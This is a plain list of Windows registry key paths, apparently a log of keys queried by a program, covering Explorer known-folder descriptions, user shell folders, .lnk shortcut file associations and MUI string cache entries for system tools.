HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CLASSES_ROOT\.lnk
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)
HKEY_CLASSES_ROOT\.lnk\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\UserChoice
HKEY_CLASSES_ROOT\lnkfile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\DocObject
HKEY_CLASSES_ROOT\SystemFileAssociations\.lnk
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CLSID\(Default)
HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}\Implemented Categories\{00021490-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NeverShowExt
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-735
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-734
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\AccessibilityCpl.dll,-10
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-737
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Start Menu
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\sud.dll,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wucltux.dll,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\ehome\ehres.dll,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Windows Sidebar\sidebar.exe,-1005
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsAnytimeUpgradeUI.exe,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\DVD Maker\DVDMaker.exe,-61403
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\FXSRESM.dll,-114
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\unregmp2.exe,-4
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\XpsRchVw.exe,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\displayswitch.exe,-320
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\mip.exe,-291
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mblctr.exe,-1008
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\NetProjW.dll,-501
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mstsc.exe,-4000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SnippingTool.exe,-15051
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SoundRecorder.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SNTSearch.dll,-505
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\OobeFldr.dll,-33056
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\Speech\SpeechUX\sapi.cpl,-5555
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\dfrgui.exe,-103
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wdc.dll,-10030
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msinfo32.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\rstrui.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\miguiresource.dll,-201
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-591
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-588
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\ShapeCollector.exe,-298
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\TipTsf.dll,-80
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Windows Journal\Journal.exe,-3074
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\comres.dll,-3410
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mycomput.dll,-300
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\odbcint.dll,-1310
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\miguiresource.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\iscsicpl.dll,-5001
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\MdSched.exe,-4001
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wdc.dll,-10021
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\pmcsnap.dll,-700
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wsecedit.dll,-718
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\filemgmt.dll,-2204
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msconfig.exe,-126
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\AuthFWGP.dll,-20
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\gameux.dll,-10082
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\sdcpl.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\recdisc.exe,-2000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msra.exe,-100
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalRedirectOnly
